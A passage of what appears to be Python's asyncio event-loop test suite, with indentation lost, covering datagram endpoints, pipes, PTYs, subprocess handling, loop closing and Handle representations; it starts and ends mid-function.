host, port = s_transport.get_extra_info('sockname')
self.assertIsInstance(s_transport, asyncio.Transport)
self.assertIsInstance(server, TestMyDatagramProto)
self.assertEqual('INITIALIZED', server.state)
self.assertIs(server.transport, s_transport)
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(loop=self.loop),
remote_addr=(host, port))
transport, client = self.loop.run_until_complete(coro)
self.assertIsInstance(transport, asyncio.Transport)
self.assertIsInstance(client, MyDatagramProto)
self.assertEqual('INITIALIZED', client.state)
self.assertIs(client.transport, transport)
transport.sendto(b'xxx')
test_utils.run_until(self.loop, lambda: server.nbytes)
self.assertEqual(3, server.nbytes)
test_utils.run_until(self.loop, lambda: client.nbytes)
# received
self.assertEqual(8, client.nbytes)
# extra info is available
self.assertIsNotNone(transport.get_extra_info('sockname'))
# close connection
transport.close()
self.loop.run_until_complete(client.done)
self.assertEqual('CLOSED', client.state)
server.transport.close()
def test_create_datagram_endpoint_sock(self):
sock = None
local_address = ('127.0.0.1', 0)
infos = self.loop.run_until_complete(
self.loop.getaddrinfo(
*local_address, type=socket.SOCK_DGRAM))
for family, type, proto, cname, address in infos:
try:
sock = socket.socket(family=family, type=type, proto=proto)
sock.setblocking(False)
sock.bind(address)
except:
pass
else:
break
else:
assert False, 'Can not create socket.'
f = self.loop.create_connection(
lambda: MyDatagramProto(loop=self.loop), sock=sock)
tr, pr = self.loop.run_until_complete(f)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, MyDatagramProto)
tr.close()
self.loop.run_until_complete(pr.done)
def test_internal_fds(self):
loop = self.create_event_loop()
if not isinstance(loop, selector_events.BaseSelectorEventLoop):
loop.close()
self.skipTest('loop is not a BaseSelectorEventLoop')
self.assertEqual(1, loop._internal_fds)
loop.close()
self.assertEqual(0, loop._internal_fds)
self.assertIsNone(loop._csock)
self.assertIsNone(loop._ssock)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_read_pipe(self):
proto = MyReadPipeProto(loop=self.loop)
rpipe, wpipe = os.pipe()
pipeobj = io.open(rpipe, 'rb', 1024)
@asyncio.coroutine
def connect():
t, p = yield from self.loop.connect_read_pipe(
lambda: proto, pipeobj)
self.assertIs(p, proto)
self.assertIs(t, proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(0, proto.nbytes)
self.loop.run_until_complete(connect())
os.write(wpipe, b'1')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 1)
self.assertEqual(1, proto.nbytes)
os.write(wpipe, b'2345')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 5)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(5, proto.nbytes)
os.close(wpipe)
self.loop.run_until_complete(proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], proto.state)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_unclosed_pipe_transport(self):
# This test reproduces the issue #314 on GitHub
loop = self.create_event_loop()
read_proto = MyReadPipeProto(loop=loop)
write_proto = MyWritePipeProto(loop=loop)
rpipe, wpipe = os.pipe()
rpipeobj = io.open(rpipe, 'rb', 1024)
wpipeobj = io.open(wpipe, 'w', 1024)
@asyncio.coroutine
def connect():
read_transport, _ = yield from loop.connect_read_pipe(
lambda: read_proto, rpipeobj)
write_transport, _ = yield from loop.connect_write_pipe(
lambda: write_proto, wpipeobj)
return read_transport, write_transport
# Run and close the loop without closing the transports
read_transport, write_transport = loop.run_until_complete(connect())
loop.close()
# These 'repr' calls used to raise an AttributeError
# See Issue #314 on GitHub
self.assertIn('open', repr(read_transport))
self.assertIn('open', repr(write_transport))
# Clean up (avoid ResourceWarning)
rpipeobj.close()
wpipeobj.close()
read_transport._pipe = None
write_transport._pipe = None
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
# select, poll and kqueue don't support character devices (PTY) on Mac OS X
# older than 10.6 (Snow Leopard)
@support.requires_mac_ver(10, 6)
# Issue #20495: The test hangs on FreeBSD 7.2 but pass on FreeBSD 9
@support.requires_freebsd_version(8)
def test_read_pty_output(self):
proto = MyReadPipeProto(loop=self.loop)
master, slave = os.openpty()
master_read_obj = io.open(master, 'rb', 0)
@asyncio.coroutine
def connect():
t, p = yield from self.loop.connect_read_pipe(lambda: proto,
master_read_obj)
self.assertIs(p, proto)
self.assertIs(t, proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(0, proto.nbytes)
self.loop.run_until_complete(connect())
os.write(slave, b'1')
test_utils.run_until(self.loop, lambda: proto.nbytes)
self.assertEqual(1, proto.nbytes)
os.write(slave, b'2345')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 5)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(5, proto.nbytes)
os.close(slave)
self.loop.run_until_complete(proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], proto.state)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_write_pipe(self):
rpipe, wpipe = os.pipe()
pipeobj = io.open(wpipe, 'wb', 1024)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, pipeobj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = bytearray()
def reader(data):
chunk = os.read(rpipe, 1024)
data += chunk
return len(data)
test_utils.run_until(self.loop, lambda: reader(data) >= 1)
self.assertEqual(b'1', data)
transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5)
self.assertEqual(b'12345', data)
self.assertEqual('CONNECTED', proto.state)
os.close(rpipe)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_write_pipe_disconnect_on_close(self):
rsock, wsock = test_utils.socketpair()
rsock.setblocking(False)
pipeobj = io.open(wsock.detach(), 'wb', 1024)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, pipeobj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = self.loop.run_until_complete(self.loop.sock_recv(rsock, 1024))
self.assertEqual(b'1', data)
rsock.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
# select, poll and kqueue don't support character devices (PTY) on Mac OS X
# older than 10.6 (Snow Leopard)
@support.requires_mac_ver(10, 6)
def test_write_pty(self):
master, slave = os.openpty()
slave_write_obj = io.open(slave, 'wb', 0)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, slave_write_obj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = bytearray()
def reader(data):
chunk = os.read(master, 1024)
data += chunk
return len(data)
test_utils.run_until(self.loop, lambda: reader(data) >= 1,
timeout=10)
self.assertEqual(b'1', data)
transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5,
timeout=10)
self.assertEqual(b'12345', data)
self.assertEqual('CONNECTED', proto.state)
os.close(master)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
# select, poll and kqueue don't support character devices (PTY) on Mac OS X
# older than 10.6 (Snow Leopard)
@support.requires_mac_ver(10, 6)
def test_bidirectional_pty(self):
master, read_slave = os.openpty()
write_slave = os.dup(read_slave)
tty.setraw(read_slave)
slave_read_obj = io.open(read_slave, 'rb', 0)
read_proto = MyReadPipeProto(loop=self.loop)
read_connect = self.loop.connect_read_pipe(lambda: read_proto,
slave_read_obj)
read_transport, p = self.loop.run_until_complete(read_connect)
self.assertIs(p, read_proto)
self.assertIs(read_transport, read_proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(0, read_proto.nbytes)
slave_write_obj = io.open(write_slave, 'wb', 0)
write_proto = MyWritePipeProto(loop=self.loop)
write_connect = self.loop.connect_write_pipe(lambda: write_proto,
slave_write_obj)
write_transport, p = self.loop.run_until_complete(write_connect)
self.assertIs(p, write_proto)
self.assertIs(write_transport, write_proto.transport)
self.assertEqual('CONNECTED', write_proto.state)
data = bytearray()
def reader(data):
chunk = os.read(master, 1024)
data += chunk
return len(data)
write_transport.write(b'1')
test_utils.run_until(self.loop, lambda: reader(data) >= 1, timeout=10)
self.assertEqual(b'1', data)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual('CONNECTED', write_proto.state)
os.write(master, b'a')
test_utils.run_until(self.loop, lambda: read_proto.nbytes >= 1,
timeout=10)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(1, read_proto.nbytes)
self.assertEqual('CONNECTED', write_proto.state)
write_transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5, timeout=10)
self.assertEqual(b'12345', data)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual('CONNECTED', write_proto.state)
os.write(master, b'bcde')
test_utils.run_until(self.loop, lambda: read_proto.nbytes >= 5,
timeout=10)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(5, read_proto.nbytes)
self.assertEqual('CONNECTED', write_proto.state)
os.close(master)
read_transport.close()
self.loop.run_until_complete(read_proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], read_proto.state)
write_transport.close()
self.loop.run_until_complete(write_proto.done)
self.assertEqual('CLOSED', write_proto.state)
def test_prompt_cancellation(self):
r, w = test_utils.socketpair()
r.setblocking(False)
f = self.loop.sock_recv(r, 1)
ov = getattr(f, 'ov', None)
if ov is not None:
self.assertTrue(ov.pending)
@asyncio.coroutine
def main():
try:
self.loop.call_soon(f.cancel)
yield from f
except asyncio.CancelledError:
res = 'cancelled'
else:
res = None
finally:
self.loop.stop()
return res
start = time.monotonic()
t = asyncio.Task(main(), loop=self.loop)
self.loop.run_forever()
elapsed = time.monotonic() - start
self.assertLess(elapsed, 0.1)
self.assertEqual(t.result(), 'cancelled')
self.assertRaises(asyncio.CancelledError, f.result)
if ov is not None:
self.assertFalse(ov.pending)
self.loop._stop_serving(r)
r.close()
w.close()
def test_timeout_rounding(self):
def _run_once():
self.loop._run_once_counter += 1
orig_run_once()
orig_run_once = self.loop._run_once
self.loop._run_once_counter = 0
self.loop._run_once = _run_once
@asyncio.coroutine
def wait():
loop = self.loop
yield from asyncio.sleep(1e-2, loop=loop)
yield from asyncio.sleep(1e-4, loop=loop)
yield from asyncio.sleep(1e-6, loop=loop)
yield from asyncio.sleep(1e-8, loop=loop)
yield from asyncio.sleep(1e-10, loop=loop)
self.loop.run_until_complete(wait())
# The ideal number of call is 12, but on some platforms, the selector
# may sleep at little bit less than timeout depending on the resolution
# of the clock used by the kernel. Tolerate a few useless calls on
# these platforms.
self.assertLessEqual(self.loop._run_once_counter, 20,
{'clock_resolution': self.loop._clock_resolution,
'selector': self.loop._selector.__class__.__name__})
def test_remove_fds_after_closing(self):
loop = self.create_event_loop()
callback = lambda: None
r, w = test_utils.socketpair()
self.addCleanup(r.close)
self.addCleanup(w.close)
loop.add_reader(r, callback)
loop.add_writer(w, callback)
loop.close()
self.assertFalse(loop.remove_reader(r))
self.assertFalse(loop.remove_writer(w))
def test_add_fds_after_closing(self):
loop = self.create_event_loop()
callback = lambda: None
r, w = test_utils.socketpair()
self.addCleanup(r.close)
self.addCleanup(w.close)
loop.close()
with self.assertRaises(RuntimeError):
loop.add_reader(r, callback)
with self.assertRaises(RuntimeError):
loop.add_writer(w, callback)
def test_close_running_event_loop(self):
@asyncio.coroutine
def close_loop(loop):
self.loop.close()
coro = close_loop(self.loop)
with self.assertRaises(RuntimeError):
self.loop.run_until_complete(coro)
def test_close(self):
self.loop.close()
@asyncio.coroutine
def test():
pass
func = lambda: False
coro = test()
self.addCleanup(coro.close)
# operation blocked when the loop is closed
with self.assertRaises(RuntimeError):
self.loop.run_forever()
with self.assertRaises(RuntimeError):
fut = asyncio.Future(loop=self.loop)
self.loop.run_until_complete(fut)
with self.assertRaises(RuntimeError):
self.loop.call_soon(func)
with self.assertRaises(RuntimeError):
self.loop.call_soon_threadsafe(func)
with self.assertRaises(RuntimeError):
self.loop.call_later(1.0, func)
with self.assertRaises(RuntimeError):
self.loop.call_at(self.loop.time() + .0, func)
with self.assertRaises(RuntimeError):
self.loop.run_in_executor(None, func)
with self.assertRaises(RuntimeError):
self.loop.create_task(coro)
with self.assertRaises(RuntimeError):
self.loop.add_signal_handler(signal.SIGTERM, func)
class SubprocessTestsMixin:
def check_terminated(self, returncode):
if sys.platform == 'win32':
self.assertIsInstance(returncode, int)
# expect 1 but sometimes get 0
else:
self.assertEqual(-signal.SIGTERM, returncode)
def check_killed(self, returncode):
if sys.platform == 'win32':
self.assertIsInstance(returncode, int)
# expect 1 but sometimes get 0
else:
self.assertEqual(-signal.SIGKILL, returncode)
def test_subprocess_exec(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
stdin = transp.get_pipe_transport(0)
stdin.write(b'Python The Winner')
self.loop.run_until_complete(proto.got_data[1].wait())
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
self.assertEqual(b'Python The Winner', proto.data[1])
def test_subprocess_interactive(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
stdin = transp.get_pipe_transport(0)
stdin.write(b'Python ')
self.loop.run_until_complete(proto.got_data[1].wait())
proto.got_data[1].clear()
self.assertEqual(b'Python ', proto.data[1])
stdin.write(b'The Winner')
self.loop.run_until_complete(proto.got_data[1].wait())
self.assertEqual(b'Python The Winner', proto.data[1])
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
def test_subprocess_shell(self):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'echo Python')
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.get_pipe_transport(0).close()
self.loop.run_until_complete(proto.completed)
self.assertEqual(0, proto.returncode)
self.assertTrue(all(f.done() for f in proto.disconnects.values()))
self.assertEqual(proto.data[1].rstrip(b'\r\n'), b'Python')
self.assertEqual(proto.data[2], b'')
transp.close()
def test_subprocess_exitcode(self):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
transp.close()
def test_subprocess_close_after_finish(self):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.assertIsNone(transp.get_pipe_transport(0))
self.assertIsNone(transp.get_pipe_transport(1))
self.assertIsNone(transp.get_pipe_transport(2))
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
self.assertIsNone(transp.close())
def test_subprocess_kill(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.kill()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
transp.close()
def test_subprocess_terminate(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.terminate()
self.loop.run_until_complete(proto.completed)
self.check_terminated(proto.returncode)
transp.close()
@unittest.skipIf(sys.platform == 'win32', "Don't have SIGHUP")
def test_subprocess_send_signal(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.send_signal(signal.SIGHUP)
self.loop.run_until_complete(proto.completed)
self.assertEqual(-signal.SIGHUP, proto.returncode)
transp.close()
def test_subprocess_stderr(self):
prog = os.path.join(os.path.dirname(__file__), 'echo2.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
stdin.write(b'test')
self.loop.run_until_complete(proto.completed)
transp.close()
self.assertEqual(b'OUT:test', proto.data[1])
self.assertTrue(proto.data[2].startswith(b'ERR:test'), proto.data[2])
self.assertEqual(0, proto.returncode)
def test_subprocess_stderr_redirect_to_stdout(self):
prog = os.path.join(os.path.dirname(__file__), 'echo2.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog, stderr=subprocess.STDOUT)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
self.assertIsNotNone(transp.get_pipe_transport(1))
self.assertIsNone(transp.get_pipe_transport(2))
stdin.write(b'test')
self.loop.run_until_complete(proto.completed)
self.assertTrue(proto.data[1].startswith(b'OUT:testERR:test'),
proto.data[1])
self.assertEqual(b'', proto.data[2])
transp.close()
self.assertEqual(0, proto.returncode)
def test_subprocess_close_client_stream(self):
prog = os.path.join(os.path.dirname(__file__), 'echo3.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
stdout = transp.get_pipe_transport(1)
stdin.write(b'test')
self.loop.run_until_complete(proto.got_data[1].wait())
self.assertEqual(b'OUT:test', proto.data[1])
stdout.close()
self.loop.run_until_complete(proto.disconnects[1])
stdin.write(b'xxx')
self.loop.run_until_complete(proto.got_data[2].wait())
if sys.platform != 'win32':
self.assertEqual(b'ERR:BrokenPipeError', proto.data[2])
else:
# After closing the read-end of a pipe, writing to the
# write-end using os.write() fails with errno==EINVAL and
# GetLastError()==ERROR_INVALID_NAME on Windows!?! (Using
# WriteFile() we get ERROR_BROKEN_PIPE as expected.)
self.assertEqual(b'ERR:OSError', proto.data[2])
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
def test_subprocess_wait_no_same_group(self):
# start the new process in a new session
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None,
start_new_session=True)
_, proto = yield self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
def test_subprocess_exec_invalid_args(self):
@asyncio.coroutine
def connect(**kwds):
yield from self.loop.subprocess_exec(
asyncio.SubprocessProtocol,
'pwd', **kwds)
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(universal_newlines=True))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(bufsize=4096))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(shell=True))
def test_subprocess_shell_invalid_args(self):
@asyncio.coroutine
def connect(cmd=None, **kwds):
if not cmd:
cmd = 'pwd'
yield from self.loop.subprocess_shell(
asyncio.SubprocessProtocol,
cmd, **kwds)
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(['ls', '-l']))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(universal_newlines=True))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(bufsize=4096))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(shell=False))
if sys.platform == 'win32':
class SelectEventLoopTests(EventLoopTestsMixin, test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop()
class ProactorEventLoopTests(EventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.ProactorEventLoop()
if not sslproto._is_sslproto_available():
def test_create_ssl_connection(self):
raise unittest.SkipTest("need python 3.5 (ssl.MemoryBIO)")
def test_create_server_ssl(self):
raise unittest.SkipTest("need python 3.5 (ssl.MemoryBIO)")
def test_create_server_ssl_verify_failed(self):
raise unittest.SkipTest("need python 3.5 (ssl.MemoryBIO)")
def test_create_server_ssl_match_failed(self):
raise unittest.SkipTest("need python 3.5 (ssl.MemoryBIO)")
def test_create_server_ssl_verified(self):
raise unittest.SkipTest("need python 3.5 (ssl.MemoryBIO)")
def test_legacy_create_ssl_connection(self):
raise unittest.SkipTest("IocpEventLoop incompatible with legacy SSL")
def test_legacy_create_server_ssl(self):
raise unittest.SkipTest("IocpEventLoop incompatible with legacy SSL")
def test_legacy_create_server_ssl_verify_failed(self):
raise unittest.SkipTest("IocpEventLoop incompatible with legacy SSL")
def test_legacy_create_server_ssl_match_failed(self):
raise unittest.SkipTest("IocpEventLoop incompatible with legacy SSL")
def test_legacy_create_server_ssl_verified(self):
raise unittest.SkipTest("IocpEventLoop incompatible with legacy SSL")
def test_reader_callback(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
def test_reader_callback_cancel(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
def test_writer_callback(self):
raise unittest.SkipTest("IocpEventLoop does not have add_writer()")
def test_writer_callback_cancel(self):
raise unittest.SkipTest("IocpEventLoop does not have add_writer()")
def test_create_datagram_endpoint(self):
raise unittest.SkipTest(
"IocpEventLoop does not have create_datagram_endpoint()")
def test_remove_fds_after_closing(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
else:
from asyncio import selectors
class UnixEventLoopTestsMixin(EventLoopTestsMixin):
def setUp(self):
super().setUp()
watcher = asyncio.SafeChildWatcher()
watcher.attach_loop(self.loop)
asyncio.set_child_watcher(watcher)
def tearDown(self):
asyncio.set_child_watcher(None)
super().tearDown()
if hasattr(selectors, 'KqueueSelector'):
class KqueueEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(
selectors.KqueueSelector())
# kqueue doesn't support character devices (PTY) on Mac OS X older
# than 10.9 (Maverick)
@support.requires_mac_ver(10, 9)
# Issue #20667: KqueueEventLoopTests.test_read_pty_output()
# hangs on OpenBSD 5.5
@unittest.skipIf(sys.platform.startswith('openbsd'),
'test hangs on OpenBSD')
def test_read_pty_output(self):
super().test_read_pty_output()
# kqueue doesn't support character devices (PTY) on Mac OS X older
# than 10.9 (Maverick)
@support.requires_mac_ver(10, 9)
def test_write_pty(self):
super().test_write_pty()
if hasattr(selectors, 'EpollSelector'):
class EPollEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(selectors.EpollSelector())
if hasattr(selectors, 'PollSelector'):
class PollEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(selectors.PollSelector())
# Should always exist.
class SelectEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(selectors.SelectSelector())
def noop(*args, **kwargs):
pass
class HandleTests(test_utils.TestCase):
def setUp(self):
super().setUp()
self.loop = mock.Mock()
self.loop.get_debug.return_value = True
def test_handle(self):
def callback(*args):
return args
args = ()
h = asyncio.Handle(callback, args, self.loop)
self.assertIs(h._callback, callback)
self.assertIs(h._args, args)
self.assertFalse(h._cancelled)
h.cancel()
self.assertTrue(h._cancelled)
def test_callback_with_exception(self):
def callback():
raise ValueError()
self.loop = mock.Mock()
self.loop.call_exception_handler = mock.Mock()
h = asyncio.Handle(callback, (), self.loop)
h._run()
self.loop.call_exception_handler.assert_called_with({
'message': test_utils.MockPattern('Exception in callback.*'),
'exception': mock.ANY,
'handle': h,
'source_traceback': h._source_traceback,
})
def test_handle_weakref(self):
wd = weakref.WeakValueDictionary()
h = asyncio.Handle(lambda: None, (), self.loop)
wd['h'] = h # Would fail without __weakref__ slot.
def test_handle_repr(self):
self.loop.get_debug.return_value = False
# simple function
h = asyncio.Handle(noop, (1, 2), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<Handle noop(1, 2) at %s:%s>'
% (filename, lineno))
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<Handle cancelled>')
# decorated function
cb = asyncio.coroutine(noop)
h = asyncio.Handle(cb, (), self.loop)
self.assertEqual(repr(h),
'<Handle noop() at %s:%s>'
% (filename, lineno))
# partial function
cb = functools.partial(noop, 1, 2)
h = asyncio.Handle(cb, (3,), self.loop)
regex = (r'^<Handle noop\(1, 2\)\(3\) at %s:%s>$'
% (re.escape(filename), lineno))
self.assertRegex(repr(h), regex)
# partial function with keyword args
cb = functools.partial(noop, x=1)
h = asyncio.Handle(cb, (2, 3), self.loop)
regex = (r'^<Handle noop\(x=1\)\(2, 3\) at %s:%s>$'
% (re.escape(filename), lineno))
self.assertRegex(repr(h), regex)
# partial method
if sys.version_info >= (3, 4):
method = HandleTests.test_handle_repr
cb = functools.partialmethod(method)
filename, lineno = test_utils.get_function_source(method)
h = asyncio.Handle(cb, (), self.loop)
cb_regex = r'<function HandleTests.test_handle_repr .*>'
cb_regex = (r'functools.partialmethod\(%s, , \)\(\)' % cb_regex)
regex = (r'^<Handle %s at %s:%s>$'
% (cb_regex, re.escape(filename), lineno))
self.assertRegex(repr(h), regex)
def test_handle_repr_debug(self):
self.loop.get_debug.return_value = True
# simple function
create_filename = __file__
create_lineno = sys._getframe().f_lineno + 1
h = asyncio.Handle(noop, (1, 2), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<Handle noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# cancelled handle
h.cancel()
self.assertEqual(
repr(h),
'<Handle cancelled noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# double cancellation won't overwrite _repr
h.cancel()
self.assertEqual(
repr(h),
'<Handle cancelled noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
def test_handle_source_traceback(self):
loop = asyncio.get_event_loop_policy().new_event_loop()
loop.set_debug(True)
self.set_event_loop(loop)
def check_source_traceback(h):
lineno = sys._getframe(1).f_lineno - 1
self.assertIsInstance(h._source_traceback, list)
self.assertEqual(h._source_traceback[-1][:3],
(__file__,
lineno,
'test_handle_source_traceback'))
# call_soon
h = loop.call_soon(noop)
check_source_traceback(h)
# call_soon_threadsafe
h = loop.call_soon_threadsafe(noop)
check_source_traceback(h)
# call_later
h = loop.call_later(0, noop)
check_source_traceback(h)
# call_at
h = loop.call_later(0, noop)
check_source_traceback(h)
@unittest.skipUnless(hasattr(collections.abc, 'Coroutine'),
'No collections.abc.Coroutine')
def test_coroutine_like_object_debug_formatting(self):
# Test that asyncio can format coroutines that are instances of
# collections.abc.Coroutine, but lack cr_core or gi_code attributes
# (such as ones compiled with Cython).
class Coro:
__name__ = 'AAA'
def send(self, v):
pass
def throw(self, *exc):
pass
def close(self):
pass
def __await__(self):
pass
coro = Coro()
self.assertTrue(asyncio.iscoroutine(coro))
self.assertEqual(coroutines._format_coroutine(coro), 'AAA()')
coro.__qualname__ = 'BBB'
self.assertEqual(coroutines._format_coroutine(coro), 'BBB()')
coro.cr_running = True
self.assertEqual(coroutines._format_coroutine(coro), 'BBB() running')
class TimerTests(unittest.TestCase):
def setUp(self):
super().setUp()
self.loop = mock.Mock()
def test_hash(self):
when = time.monotonic()
h = asyncio.TimerHandle(when, lambda: False, (),
mock.Mock())
self.assertEqual(hash(h), hash(when))
def test_timer(self):
def callback(*args):
return args
